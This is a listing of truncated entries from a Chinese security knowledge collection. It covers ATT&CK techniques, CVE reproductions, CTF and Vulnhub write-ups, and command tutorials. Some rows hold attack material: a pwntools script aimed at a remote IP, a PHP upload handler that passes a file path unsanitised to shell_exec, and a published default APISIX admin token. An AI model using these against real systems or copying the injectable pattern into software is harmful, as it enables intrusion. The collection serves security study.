# T1190-CVE-2021-42013-Apache HTTP Server 2.4.50路径穿越漏洞 ## 来自ATT&CK的描述 使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。 如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策...
sec-knowleage
from pwn import * import random #r=process(["ltrace", "./sss"]) r=remote("54.202.7.144", 9875) print r.recvuntil(">_") print r.recv() def send(what): print ">>",repr(what) r.send(what) sleep(0.2) try: print r.recv(timeout=4) except: pass def sign(what): send("1\n") send(wh...
sec-knowleage
# Hyde Street [146 points] (23 solves) > Top of the hill, at the source. > > But the sky still beckons. In this task we got a Docker container. However, unlike with previous tasks in the same category, there were no Crystal executables. Instead we got some weird Ruby code that, at a glance, seemed to generate and compi...
sec-knowleage
version: '2.4' services: core: image: vulhub/jumpserver:3.6.3 ulimits: core: 0 restart: always tty: true environment: MAGNUS_PORT: ${MAGNUS_PORT:-30000-30020} env_file: config.env ports: - "8080:80" - "2222:2222" networks: - jumpnet mysql: image: ma...
sec-knowleage
# 基础语法 --- ## 基本语法 ### 注释 **单行注释** 两个减号是单行注释: ```lua -- ``` **多行注释** ```lua --[[ 多行注释 多行注释 --]] ``` ### 标示符 Lua 标示符用于定义一个变量,函数获取其他用户定义的项。标示符以一个字母 A 到 Z 或 a 到 z 或下划线 _ 开头后加上 0 个或多个字母,下划线,数字(0 到 9)。 最好不要使用下划线加大写字母的标示符,因为 Lua 的保留字也是这样的。 Lua 不允许使用特殊字符如 `@`, `$`, 和 `%` 来定义标示符。 Lua 是一个区分大小写的编程语言。因此在 Lua 中 Test 与 test 是两个不...
sec-knowleage
# T1592-003-收集目标组织主机信息-固件信息 ## 来自ATT&CK的描述 在入侵受害者之前,攻击者可能会收集有关受害者主机固件的信息,这些信息可以在目标定位期间使用。有关主机固件的信息可能包括各种详细信息,例如特定主机上的类型和版本,这可以用来推测出更多目标环境中主机的信息(例如:配置,用途,使用期限/补丁级别等)。 攻击者可以通过各种方式收集此信息,例如通过网络钓鱼收集。有关固件的信息也可能通过在线或其他可访问的数据集(例如:职位发布,网络地图,评估报告,履历表或购买发票)暴露给攻击者(引自:ArsTechnica Intel)。收集这些信息可能为如下活动提供可能性:其他形式的侦察活动(例如:[搜索开放网站/域](ht...
sec-knowleage
# Lampiao > https://download.vulnhub.com/lampiao/Lampiao.zip 靶场IP:`192.168.32.233 ` 扫描对外端口服务 ``` ┌──(root💀kali)-[/tmp] └─# nmap -p 1-65535 -sV 192.168.32.233 Starting Nmap 7.9...
sec-knowleage
# 数字签名 在日常生活中,我们在参加某个活动的时候,可能会需要签名,以便于证明我们确实到场了,,,防止导员啥的,你懂得。。。但其实吧,这种签名很容易被伪造,随便找一个人代签一下,或者说找一个会模仿别人字迹的人帮忙签一下。在计算机世界中,我们可能会需要电子签名,因为我们大多数情况下会使用电子文件,那这时候怎么办呢?当然,我们仍然可以选择使用自己的名字。但其实还有另外一种方式,那就是采用数字签名,这种签名更加难以伪造,可信程度更高。数字签名的主要用处是确保消息确实来自于声称产生该消息的人。 数字签名(digital signature)主要用于对数字消息(digital message)进行签名,以防消息的冒名伪造或篡改,亦可以用于通...
sec-knowleage
{% raw %} # 十六、模板注入 > 作者:Peter Yaworski > 译者:[飞龙](https://github.com/) > 协议:[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/) 模板引擎是允许开发者或设计师在创建动态网页的时候,从数据展示中分离编程逻辑的工具。换句话说,除了拥有接收 HTTP 请求的代码,从数据库查询必需的数据并且之后将其在单个文件中将其展示给用户之外,模板引擎从计算它的剩余代码中分离了数据的展示(此外,流行的框架和内容管理系统也会从查询中分离 HTTP 请求)。 服务端模板注入(SSTI)在这些引擎渲染用...
sec-knowleage
mysqladmin === MySQL服务器管理客户端 ## 补充说明 **mysqladmin命令** 是mysql服务器管理任务的客户端工具,它可以检查mytsql服务器的配置和当前工作状态,创建和删除数据库,创建用户和修改用户密码等操作。 ### 语法 ```shell mysqladmin(选项)(参数) ``` ### 选项 ```shell -h:MySQL服务器主机名或ip地址; -u:连接MySQL服务器的用户名; -p:连接MySQL服务器的密码; --help:显示帮助信息。 ``` ### 参数 管理命令:需要在MySQL服务器上执行的管理命令。 **mysqladmin支持下列命令:** ```s...
sec-knowleage
# be-quick-or-be-dead-2 Reversing, 275 points ## Description: > As you enjoy this [music](https://www.youtube.com/watch?v=CTt1vk9nM9c) even more, another executable **be-quick-or-be-dead-2** shows up. Can you run this fast enough too? Attached was a binary file. ## Solution: Let's run the file: ```console root@kali:/me...
sec-knowleage
# Python 3 from signal import alarm from Crypto.Util.number import * import Crypto.Random as Random with open("secretkey", "r") as f: sk1 = int(f.readline(), 16) sk2 = int(f.readline(), 16) with open("publickey", "r") as f: n = int(f.readline(), 16) n2 = int(f.readline(), 16) g = int(f.readline(),...
sec-knowleage
.\" You can view this file with: .\" nroff -man [filename] .\" .TH svnlook 1 .SH NAME svnlook \- Subversion 仓库检索工具 .SH "SYNOPSIS 总览" .TP \fBsvnlook\fP \fIcommand\fP \fI/path/to/repos\fP [\fIoptions\fP] [\fIargs\fP] .SH "OVERVIEW 概述" Subversion 是一个版本控制系统,允许保存旧版本的文件和目录 (通常是源代码),保存一个记录何人,何时,为何作出修改等等信息的日志,与 CVS,RCS 或者 SCCS...
sec-knowleage
--- title: fragroute categories: Information Gathering tags: [kali linux,fragroute,information gathering,evasion] date: 2016-10-24 14:40:23 --- 0x00 fragroute介绍 ------------- Fragroute能够截取、修改和重写向外发送的报文,实现了大部分的IDS攻击功能。Fragroute起重要作用的是一个简单的规则设置语言,以它去实现延迟、复制、丢弃、碎片、重叠、打印、重排、分割、源路由或其他一些向目标主机发送数据包的攻击。这个工具开发的本意是去测试入侵检测系统、防火墙、...
sec-knowleage
# 流量分析 直接找 解 base64 STJzX0NvbUU= flag{I2s_ComE} --- # 协议分析 找 modbus 解 base64 ZmxhZ3tzNDVlZ1dUNH0= flag{s45egWT4} --- # 工程分析 proj.hwdev 要用 HaiwellScada 进行打开 运行后就有 flag 了 flag{oz5K5stdC3oNS1ouV60Lj} --- # 密码恢复 安装 力控科技监控组态软件ForceControl V7.0 打开 PCZ 文件 找到用户管理 发现账号 用星号密码查看器直接看 flag{elexadmin} --- # 逆向分析 改自身host文件,将chall.pwn...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "POSTGRES" "1" "2003-11-02" "Application" "PostgreSQL Server Applications" .SH NAME postgres \- 以单用户模式运行一个 PostgreSQL服务器 .SH SYNOPSIS .sp \fBpostgres\fR\fR [ \fR\fB-A \fR\fB 0\fR | \fB1\fR\fB \fR\fR]\fR\fR [ \fR\fB-B \fInbuffers\fB \fR\fR]\fR\fR [ \fR\fB-c \f...
sec-knowleage
# Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558) Apache Solr 是一个开源的搜索服务器。 在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。 具体漏洞原理和POC可以参考: - https://nvd.nist.gov/vuln/detail/CVE-2019-17558 - https://issues.apache.org/jira/browse/SOLR-13971 - https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133 - ht...
sec-knowleage
iptables-save === 备份iptables的表配置 ## 补充说明 **iptables-save命令** 用于将linux内核中的iptables表导出到标准输出设备商,通常,使用shell中I/O重定向功能将其输出保存到指定文件中。 ### 语法 ```shell iptables-save(选项) ``` ### 选项 ```shell -c:指定要保存的iptables表时,保存当权的数据包计算器和字节计数器的值; -t:指定要保存的表的名称。 ``` ### 实例 ```shell [root@localhost ~]# iptables-save -t filter > iptables.bak [r...
sec-knowleage
# LDAP未授权访问漏洞 ## 介绍 LDAP的全称为Lightweight Directory Access Protocol(轻量级目录访问协议), 基于X.500标准, 支持 TCP/IP。 LDAP目录为数据库,通过LDAP服务器(相当于DBMS)处理查询和更新, 以树状的层次结构来存储数据,相对关系型数据库, LDAP主要是优化数据读取的性能,适用于比较少改变、跨平台的信息。 **LDAP属性** | 属性 | 全名 | 描述 | | ----------- | ---...
sec-knowleage
exit === 退出当前的shell。 ## 概要 ```shell exit [n] ``` ## 主要用途 - 执行exit可使shell以指定的状态值退出。若不设置参数,则以最后一条命令的返回值作为exit的返回值退出。 ## 参数 n(可选):指定的shell返回值(整数)。 ## 返回值 返回值为你指定的参数n的值,如果你指定的参数大于255或小于0,那么会通过加或减256的方式使得返回值总是处于0到255之间。 ## 例子 退出当前shell: ```shell [root@localhost ~]# exit logout ``` 也可以使用`ctrl+d`退出当前终端,下面列出了打开或关闭该功能的方法: ```sh...
sec-knowleage
## Image Archeology (Admin, 350) > We have found the file, which contains a part of gai. But where is it? > Hints > You don't need any special reverse skills to solve this. It will be enough to use strings > to reveal how the flag can be found. In this task, we received an image of a small disk. After mounting it, we f...
sec-knowleage
# Apache APISIX 默认密钥漏洞(CVE-2020-13945) Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`,攻击者利用这个Token可以访问到管理员接口,进而通过`script`参数来插入任意LUA脚本并执行。 参考链接: - https://apisix.apache.org/docs/apisix/getting-started - https://github.com/apache/apisix/pull/2244 - ...
sec-knowleage
<?php if (!empty($_FILES)): $ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION); if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) { die('Unsupported filetype uploaded.'); } $size = shell_exec("identify -format '%w x %h' {$_FILES['file_upload']['tmp_name']}"); echo "Image size is: $size"; els...
sec-knowleage
+ [Web Hacking 101 中文版](README.md) + [一、前言](1.md) + [二、黑客们请注意](2.md) + [三、引言](3.md) + [四、背景](4.md) + [五、HTML 注入](5.md) + [六、HTTP 参数污染](6.md) + [七、CRLF 注入](7.md) + [八、跨站请求伪造](8.md) + [九、应用逻辑漏洞](9.md) + [十、跨站脚本攻击](10.md) + [十一、SQL 注入](11.md) + [十二、开放重定向漏洞](12.md) + [十三、子域劫持](13.md) + [十四、XML 外部实体注入](14.md) + [十五、代码执行](15...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH TEST 1 2022年9月 "GNU coreutils 9.1...
sec-knowleage
# BackHash Crypto, 10 points ## Description > We found this thingy - we dont know what it does. ## Solution We enter the provided link and see the following form: ```html <p style="font-size: 175%;">BackHash</p> <p>The yeet replaces all occurences of f1a9 with the flag</p> <p id="out"></p> <input id="input" placeholder...
sec-knowleage
# Vulnerable Docker 1 > https://download.vulnhub.com/vulnerabledocker/vulnerable_docker_containement.ova 靶场IP:`192.168.32.225` 有两种模式:`easy`和`hard` ![image-20220911152415635](../../.gitbook/assets/image-20220911152415635.png) ## hard 扫描对外端口服务 ``` ┌──(root💀kali)-[~] └─# nmap -p 1-65535 -sV 192.168.32.225 ...
sec-knowleage